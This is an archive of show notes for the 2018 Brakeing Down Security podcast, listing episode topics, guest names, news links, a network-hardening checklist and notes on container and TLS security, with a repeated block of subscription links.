Published on: August 1, 20182018-026-insurers gathering data, netflix released a new DFIR tool, and google no longer gets phished?
Stories and topics we covered:
https://krebsonsecurity.com/2018/07/google-security-keys-neutralized-employee-phishing/
Join our #Slack Channel! Email us at [email protected]
or DM us on Twitter @brakesec
#Spotify: https://brakesec.com/spotifyBDS
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
Published on: July 27, 2018
2018-025-BsidesSPFD, threathunting, assessing risk
Sorry, this week's show took an odd turn, and we don't have much in the way of show notes... Ms. Berlin is recovering from knee surgery, and we wish her a speedy recovery.
Bryan B. got back from BsidesSPFD, MO this week, after what was a well-received talk on building community. Lots of other excellent talks from speakers like Ms. Sunny Wear , and impromptu panel with Ben Miller and a whole host of others, including:
@icssec
@bethayoung
@ViciousData
@killianditch
@fang0654
@SunnyWear
@awsmhacks
@sysopfb
@killamjr
We started talking about malware, and we ended up discussing a new channel in the BrakeSec Slack on #threatHunting. Appears there's a lot of information out there on the topic, so much so, that SANS is having a whole conference around it.
https://www.sans.org/event/threat-hunting-and-incident-response-summit-2018
@icssec
@bethayoung
@bryanbrake
@ViciousData
@killianditch
@fang0654
@SunnyWear
@awsmhacks
@sysopfb
@killamjr
2018-024- Pacu, a tool for pentesting AWS environments
Ben Caudill @rhinosecurity
Spencer Gietzen @spengietz
Rhino Security - https://rhinosecuritylabs.com/blog/
AWS escalation and mitigation blog - https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
What is the difference between this and something like Scout or Lynis?
Is it a forensic or IR tool?
How might offensive people use this tool? What is possible when you’re using this as a ‘redteam’ or ‘pentesting’ tool?
S3 bucket perms?
Security Group policy fails
Some of the hardening policies for Security groups?
RDS?
Where are you speaking… BSLV? DefCon?
https://aws.amazon.com/whitepapers/aws-security-best-practices/
https://d1.awsstatic.com/whitepapers/AWS_Cloud_Best_Practices.pdf
https://aws.amazon.com/whitepapers/
https://aws.amazon.com/blogs/security/how-to-enable-mfa-protection-on-your-aws-api-calls/
Slack
Patreon
Bsides Springfield
Join our #Slack Channel! Email us at [email protected]
or DM us on Twitter @brakesec
#Spotify: https://brakesec.com/spotifyBDS
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
Published on: July 11, 20182018-023: Cydefe interview-DNS enumeration-CTF setup & prep
Raymond Evans - CTF organizer for nolacon and Founder of CyDefe Labs
@cydefe
- CTF setup / challenges of setting up a CTF.
- Beginners & CTFs
- Types
- tips/tricks
- Biggest downfalls of CTF development
BrakeSec DerbyCon
@dragosinc dragos.com
DNS Enumeration:
DNS Tools:
https://tools.kali.org/information-gathering/theharvester
DNS Tutorial
https://www.youtube.com/watch?v=4ZtFk2dtqv0 (A cat explains DNS)
https://pentestlab.blog/tag/dns-enumeration/
DNS
Logging detailed DNS queries and responses can be beneficial for many reasons. For the first and most obvious reason is to aid in incident response. DNS logs can be largely helpful for tracking down malicious behavior, especially on endpoints in a DHCP pool. If an alert is received with a specific IP address, that IP address may not be on the same endpoint by the time someone ends up investigating. Not only does that waste time, it also gives the malicious program or attacker more time to hide themselves or spread to other machines.
DNS is also useful for tracking down other compromised hosts, downloads from malicious websites, and if malware is using Domain Generating Algorithms (DGAs) to mask malicious behavior and evade detection.
NOTE: However if a Microsoft DNS solution (prior to server 2012) is in use, according to Microsoft, “Debug logging can be resource intensive, affecting overall server performance and consuming disk space. Therefore, it should only be used temporarily when more detailed information about server performance is needed.” From Server 2012 forward DNS analytic logging is much less resource intensive. If the organization is using BIND or some DNS appliance, it should have the capability to log all information about DNS requests and replies.
How difficult has that become with the advent of GDPR and whois record anonymization?
Join our #Slack Channel! Email us at [email protected]
or DM us on Twitter @brakesec
#Spotify: https://brakesec.com/spotifyBDS
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
Published on: July 2, 20182018-022-preventing_insider_threat
After the recent Tesla insider threat event, BrakeSec decided to discuss some of the indicators of insider threat, what can be done to mitigate it, and why it happens.
news stories referenced:
https://www.infosecurity-magazine.com/news/teslas-tough-lesson-on-malicious/
https://en.wikipedia.org/wiki/Insider_threat
https://en.wikipedia.org/wiki/Insider_threat_management
Join our #Slack Channel! Email us at [email protected]
or DM us on Twitter @brakesec
#Spotify: https://brakesec.com/spotifyBDS
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
Published on: June 26, 20182018-021-TLS 1.3 discussion, Area41 report, wireshark goodness
Area41 Zurich report
Book Club - 4th Tuesday of the month
https://www.owasp.org/images/d/d3/TLS_v1.3_Overview_OWASP_Final.pdf
https://www.owasp.org/index.php/TLS_Cipher_String_Cheat_Sheet
TLS_DHE_RSA_AES_256_GCM_SHA256
TLS = Protocol
DHE = Diffie-Hellman ephemeral (provides Perfect Forward Secrecy)
Perfect Forward Secrecy = session keys won’t be compromised, even if server private keys are
Past messages and data cannot be retrieved or decrypted (https://en.wikipedia.org/wiki/Forward_secrecy)
RSA = Digital Signature (authentication)
There are only 2 (RSA, or ECDSA)
AES_256_GCM - HMAC (hashed message authentication code)
https://www.owasp.org/index.php/TLS_Cipher_String_Cheat_Sheet
https://en.wikipedia.org/wiki/HMAC#Definition_.28from_RFC_2104.29
https://en.wikipedia.org/wiki/Funicular
https://mozilla.github.io/server-side-tls/ssl-config-generator/?hsts=no
Join our #Slack Channel! Email us at [email protected]
or DM us on Twitter @brakesec
#Spotify: https://brakesec.com/spotifyBDS
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
Published on: June 20, 20182018-020: NIST's new password reqs, Ms. Berlin talks about ShowMeCon, Pwned Passwords
https://nostarch.com/packetanalysis3 -- Excellent Book! You must buy it.
DetSEC mention
ShowMe Con panel and keynote
SeaSec East standing room only. Crispin gave a great toalk about running as Standard user
Bsides Cleveland -
https://www.passwordping.com/surprising-new-password-guidelines-nist/
1Password version 7.1 integrates with Troy Hunt's "Pwned Passwords" service to check for passwords that suck
https://twitter.com/troyhunt/status/1006266985808875521
https://1password.com/sign-up/
https://www.troyhunt.com/have-i-been-pwned-is-now-partnering-with-1password/
1,300 complaints of GDPR breaches in the first 6 days of enablement:
https://iapp.org/news/a/irish-dpc-received-1300-complaints-since-gdpr-implementation-date/
https://www.pcisecuritystandards.org/about_us/leadership
2018-019-50 good ways to protect your network, brakesec summer reading program
Ms. Berlin’s mega tweet on protecting your network
https://twitter.com/InfoSystir/status/1000109571598364672
Utica College CYB617
I tweeted “utica university” many pardons
Mr. Childress’ high school class
Laurens, South Carolina
Probably spent as much as a daily coffee at Starbucks… makes all the difference.
CTF Club, and book club (summer reading series)
Patreon
SeaSec East
Showmecon
Area41con
bsidescleveland
Here are 50 FREE things you can do to improve the security of most environments:
Segmentation/Networking:
Access control lists are your friend (deny all first)
Disable ports that are unused, & setup port security
DMZ behind separate firewall
Egress Filtering (should be just as strict as Ingress)
Geoblocking
Segment with Vlans
Restrict access to backups
Role based servers only! DNS servers/DCs are just that
Network device backups
Windows:
AD delegation of rights
Best practice GPO (NIST GPO templates)
Disable LLMNR/NetBios
EMET (when OSes prior to 10 are present)
Get rid of open shares
MSBSA
WSUS
** run as a standard user ** no ‘localadmin’
Endpoints:
App Whitelisting
Block browsing from servers. Not all machines need internet access
Change ilo settings/passwords
Use Bitlocker/encryption
Patch *nix boxes
Remove unneeded software
Upgrade firmware
MFA/Auth:
Diff. local admin passwords (LAPS) https://www.microsoft.com/en-us/download/details.aspx?id=46899
Setup centralized logins for network devices. Use TACACS+ or radius
Least privileges EVERYWHERE
Separation of rights - Domain Admin use should be sparse & audited
Logging Monitoring:
Force advanced file auditing (ransomware detection)
Log successful and unsuccessful logins - Windows/Linux logging cheatsheets
Web:
Fail2ban
For the love of god implement TLS 1.2/3
URLscan
Ensure web logins use HTTPS
Mod security
Other:
Block Dns zone transfers
Close open mail relays
Disable telnet & other insecure protocols or alert on use
DNS servers should not be openly recursive
Don't forget your printers (saved creds aren't good)
Locate and destroy plain text passwords
No open wi-fi, use WPA2 + AES
Password safes
IR:
Incident Response drills
Incident Response Runbook & Bugout bag
Incident Response tabletops
Purple Team:
Internal & OSINT honeypots
User Education exercises
MITRE ATT&CK Matrix is your friend
Vulnerability Scanner
Join our #Slack Channel! Email us at [email protected]
or DM us on Twitter @brakesec
#Spotify: https://brakesec.com/spotifyBDS
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
Published on: June 6, 20182018-018-Jack Rhysider, Cryptowars of the 90s, OSINT techniques, and hacking MMOs
Jack Rhysider
Ok I think these topics should keep us busy for a while. Topics for discussion:
- Do hospitals have a free pass when being attacked? #OPJUSTINA
-
- https://nakedsecurity.sophos.com/2014/04/28/anonymous-takes-on-boston-childrens-hospital-in-opjustina/
- https://www.youtube.com/watch?v=eFVBz_ATAlU - when anonymous attacks your hospital
- The oldest known vulnerability is still a big problem. Default passwords. Why haven't we fixed this yet?
- In the 90's strong crypto was illegal online.
- The NSA scrapes social media and regular OSINT techniques to figure out how to best attack a network.
- Manfred made a living hacking MMORPGs for the last 20 years. And he tried to do it as ethically as possible.
- When a single CA is breached, it breaks the security for the whole internet.
- Toy companies aren't securing children data
- What are options when you find a major security flaw in a home router but the vendor refuses to acknowledge it much less fix it? And there's no bug bounty.
2018-017- threat models, vuln triage, useless scores, and analysis tools
Vuln mgmt tools CVE scores suck.
Threat modeling is good.
Forces you to know your environment
https://en.wikipedia.org/wiki/Kanban
https://blog.jeremiahgrossman.com/2018/05/all-these-vulnerabilities-rarely-matter.html
https://twitter.com/lnxdork/status/998559649271025664
https://googleprojectzero.blogspot.com/2015/03/exploiting-dram-rowhammer-bug-to-gain.html
https://www.theregister.co.uk/2018/05/17/nethammer_second_remote_rowhammer_exploit/
Join our #Slack Channel! Email us at [email protected]
or DM us on Twitter @brakesec
#Spotify: https://brakesec.com/spotifyBDS
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
Published on: May 23, 20182018-016- Jack Rhysider, DarkNet Diaries, and a bit of infosec history (Part 1)
Converge Detroit
Jack Rhysider- Podcaster, DarkNet Diaries
- Do hospitals have a free pass when being attacked? #OPJUSTINA
-
- https://nakedsecurity.sophos.com/2014/04/28/anonymous-takes-on-boston-childrens-hospital-in-opjustina/
- https://www.youtube.com/watch?v=eFVBz_ATAlU - when anonymous attacks your hospital
- The oldest known vulnerability is still a big problem. Default passwords. Why haven't we fixed this yet?
Join our #Slack Channel! Email us at [email protected]
or DM us on Twitter @brakesec
#Spotify: https://brakesec.com/spotifyBDS
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
Published on: May 15, 20182018-015-Data labeling, data classification, and GDPR issues
GDPR will affect any information system that processes or will process people… like it or not.
Derby Tickets
CTF and auction
Keynote
Converge Detroit
I’ll be at nolacon too
Boettcher
Recap BDIR #3
https://blog.netwrix.com/2018/05/01/five-reasons-to-ditch-manual-data-classification-methods/
https://blog.networksgroup.com/data-loss-prevention-fundamentals
Join our #Slack Channel! Email us at [email protected]
or DM us on Twitter @brakesec
#Spotify: https://brakesec.com/spotifyBDS
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
Published on: May 7, 20182018-014- Container Security with Jay Beale
Container security
Jay Beale @inguardians , @jaybeale
Containers
- What the heck is a container?
-
- Linux distribution with a kernel
-
- Containers run on top of that, sharing the kernel, but not the filesystem
- Namespaces
-
- Mount
- Network
- Hostname
- PID
- IPC
- Users
- Somebody said we’ve had containers since before Docker
-
- Containers started in 2005, with OpenVZ
- Docker was 2013, Kubernetes 2014
- Image Security
-
- CoreOS Clair for vuln scanning images
- Public repos vs private
- Don’t keep the image running for so long?
- Don’t run as root
- More Containment stuff
-
- Non-privileged containers
- Remap the users, so root in container isn’t root outside
- Drop root capabilities
- Seccomp for kernel syscalls
- AppArmor or SELinux
- All of above is about Docker, what about Kubernetes
-
- Get onto most recent version of K8S - 1.7 and 1.8 brought big security improvements
- Network policy (egress firewalls)
- RBAC (define what users and service accounts can do what)
- Use namespaces per tenant and think hard about multi-tenancy
- Use the CIS guides for lockdown of K8S and the host
- Kube-bench
Difference between containers and sandboxing
Roll your own -
Containers
Using public registries - leave you vulnerable
Use your own private repos for deploying containers
Reduce attack surface
Reduce user access
Automation will allow more security to get baked in.
https://www.infoworld.com/article/3104030/security/5-keys-to-docker-container-security.html
https://blog.blackducksoftware.com/8-takeaways-nist-application-container-security-guide
https://www.vagrantup.com/downloads.html
https://www.vmware.com/products/thinapp.html
https://www.meetup.com/SEASec-East/events/249983387/
S3 buckets / Azure Blobs
https://docs.microsoft.com/en-us/azure/architecture/aws-professional/services
https://docs.aws.amazon.com/config/latest/developerguide/s3-bucket-policy.html
Join our #Slack Channel! Email us at [email protected]
or DM us on Twitter @brakesec
#Spotify: https://brakesec.com/spotifyBDS
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
Published on: April 29, 20182018-013-Sigma_malware_report, Verizon_DBIR discussion, proper off-boarding of employees
Report from Bsides Nash - Ms. Berlin
New Job
Keynote at Bsides Springfield, MO
Mr. Boettcher talks about Sigma Malware infection.
http://www.securitybsides.com/w/page/116970567/BSidesSpfd
**new website upcoming**
Registration is coming and will be updated on next show (hopefully)
DBIR -https://www.verizonenterprise.com/resources/reports/rp_DBIR_2018_Report_execsummary_en_xg.pdf
VERIS framework
53,000 incidents
2,216 breaches?!
73% breaches were by outsiders
28% involved internal actors (but needs outside help?)
Not teaching “don’t click the link”, but instead teach, “I have no curiosity”
Discuss "Dir. Infosec" Slack story as method to halt infection
The “Living off the Land” trend continues with attack groups opting for tried-and-trusted means to infiltrate target organizations. Spear phishing is the number one infection vector employed by 71 percent of organized groups in 2017. The use of zero days continues to fall out of favor.
Off boarding people… so much process to get people on, but it’s just not mature getting people out...
Join our #Slack Channel! Email us at [email protected]
or DM us on Twitter @brakesec
#Spotify: https://brakesec.com/spotifyBDS
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
Published on: April 20, 20182018-012: SIEM tuning, collection, types of SIEM, and do you even need one?
Bryan plays 'stump the experts' with Ms. Berlin and Mr. Boettcher this week...
We discuss SIEM logging, and tuning...
How do SIEM deal with disparate log file types?
What logs should be the first to be gathered?
Is a SIEM even required, or is just a central log repo enough?
Which departments benefit the most from logging? (IT, IR, Compliance?)
Join our #Slack Channel! Email us at [email protected]
or DM us on Twitter @brakesec
#Spotify: https://brakesec.com/spotifyBDS
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
Published on: April 11, 20182018-011: Creating a Culture of Neurodiversity
Megan Roddie discusses being a High functioning Autistic, and we discuss how company and management can take advantage of the unique abilities of those with high functioning autism.
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2018-011.mp3
Matt Miller's Assembly and Reverse Engineering Class:
Still can sign up! The syllabus is here: https://drive.google.com/open?id=1alsTUhGwAAnR6BA27gGo3OdjEHFnq2wtQsynPfeWzd0
SHOW NOTES:
Link to Megan’s slides
Megan Roddie (@megan_roddie
- Diversity - Why managers should strive for diverse teams - First, Break All the Rules: What the World's Greatest Managers Do Differently
-
- Strengths - hire people based on their strengths, not their weaknesses (see StrengthsFinder 2.0)
-
- regarding Grant and Lee
- Megan: 1. Achiever, 2. Learner, 3. Intellection, 4. Focus, 5. Harmony
- Bryan: Learner, Ideation, Futuristic, Significance, Focus
- Amanda: Restorative, Learner, Input, Ideation, Focus
- Brian: Maximizer, Learner, Responsibility, Individualization, Belief
- Scores
- regarding Grant and Lee
- Weaknesses - weaknesses are made irrelevant by the strengths of others. If one employee has a weakness, you can hire someone who has great strength in that area.
- Sports teams quote (Slide 6)
- What is it? (vs. neurotypical)
- What are weaknesses of HFAs?
- What are strengths of HFAs? (Slides 17 - 22)
- HFA
- One-on-one time is the SINGLE most effective management tool, works with HFAs and neurotypicals alike → guide
- Examples (Slide 28)
- Pants
- Introductions (vendor meet at BSides example)
- Some (most?) neurotypicals get offended
- How to manage or work with HFAs
- Tips (slides 32-34)
- Structure and Routine → Productivity
- Clarity → Thorough Work
- Patience and Understanding → Dedicated & Passionate Employee
- Needs
#Spotify: https://brakesec.com/spotifyBDS
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
Join our #Slack Channel! Email us at [email protected]
or DM us on Twitter @brakesec
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
Published on: April 4, 20182018-010 - The ransoming of Atlanta, Facebook slurping PII, Dridex variants
Matt Miller’s #Assembly and #Reverse #Engineering class
$150USD for each class, 250USD for both classes
Syllabus : https://docs.google.com/document/d/1alsTUhGwAAnR6BA27gGo3OdjEHFnq2wtQsynPfeWzd0/edit?usp=sharing
Please state which class you'd like to take when ordering in the "Notes" field in Paypal https://paypal.me/BDSPodcast/150usd
To sign up for both classes: https://paypal.me/BDSPodcast/250usd
Stories:
https://threatpost.com/orbitz-warns-880000-payment-cards-suspected-stolen/130601/
TLS1.3 - https://www.theregister.co.uk/2018/03/27/with_tls_13_signed_off_its_implementation_time/
https://timtaubert.de/blog/2015/11/more-privacy-less-latency-improved-handshakes-in-tls-13
Sign up for Jay Beale's class at Black Hat 2018: https://www.blackhat.com/us-18/training/aikido-on-the-command-line-linux-lockdown-and-proactive-security.html
#Spotify: https://brakesec.com/spotifyBDS
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
Join our #Slack Channel! Email us at [email protected]
or DM us on Twitter @brakesec
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
Published on: March 27, 20182018-009- Retooling for new infosec jobs, sno0ose, Jay Beale, and mentorship
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2018-009-internships-mentorships-retooling-finding-that-unicorn-pentester.mp3
Topics discussed:
- How Jay Beale (@jaybeale @inguardians) and Brad A. (@sno0ose) do mentorship and apprenticeship in their respective orgs.
- Best methods to retool yourself if you are trying to move to a new industry
- Why 'hitting the ground running' isn't the sign of an immature organization...
Matt Miller’s #Assembly and #Reverse #Engineering class
$150USD for each class, 250USD for both classes
Syllabus : https://docs.google.com/document/d/1alsTUhGwAAnR6BA27gGo3OdjEHFnq2wtQsynPfeWzd0/edit?usp=sharing
Please state which class you'd like to take when ordering in the "Notes" field in Paypal https://paypal.me/BDSPodcast/150usd
To sign up for both classes: https://paypal.me/BDSPodcast/250usd
Sign up for Jay Beale's class at Black Hat 2018: https://www.blackhat.com/us-18/training/aikido-on-the-command-line-linux-lockdown-and-proactive-security.html
#Spotify: https://brakesec.com/spotifyBDS
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
Join our #Slack Channel! Email us at [email protected]
or DM us on Twitter @brakesec
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
SHOW NOTES:
Guests: Mr. Jay Beale
Guest: Mr. Brad Ammerman @?????????
Announcements:
RE/ASM class (Matt Miller)
SeaSec East Meetup at Black Lodge
Jay’s class at Black Hat
Slack channel
“M3atshield”
What jobs are good segues into either blue or red teams/pentesting?
SOC Analyst (network security, pcap, IR)
SysAdmin (obviously)
Cod devs (audits, binary analysis, they know the code internals)
System architects (they know the nuts and bolts)
Security architects (segue to red team, they know how to defend, threat analysis)
Project management /management (client/customer facing, can understand the business side)
Journeyman pipelines vs. intern pipelines
Different than interns = Already highly skilled in ‘something’
Code devs
Physical security
audit/compliance
project/program management
System admin
Management
“generalist”
Retooling can be difficult
May be a paycut
Fear of failure
How do we alleviate that? (mentorship model?)
Companies looking for skilled people can’t look for what they want
